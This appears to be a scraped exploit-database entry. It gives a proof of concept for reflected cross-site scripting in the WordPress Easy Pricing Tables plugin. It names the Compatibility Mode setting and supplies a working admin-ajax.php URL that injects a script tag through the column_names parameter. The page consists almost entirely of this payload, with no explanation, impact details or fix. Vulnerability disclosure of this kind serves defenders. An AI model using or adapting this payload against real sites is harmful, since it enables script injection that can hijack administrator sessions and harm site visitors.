Share
## https://sploitus.com/exploit?id=WPEX-ID:92215D07-D129-49B4-A838-0DE1A944C06B
With the "Compatibility Mode" (/wp-admin/edit.php?post_type=easy-pricing-table&page=easy-pricing-tables-settings) setting enabled:

https://example.com/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(`xss`)</script>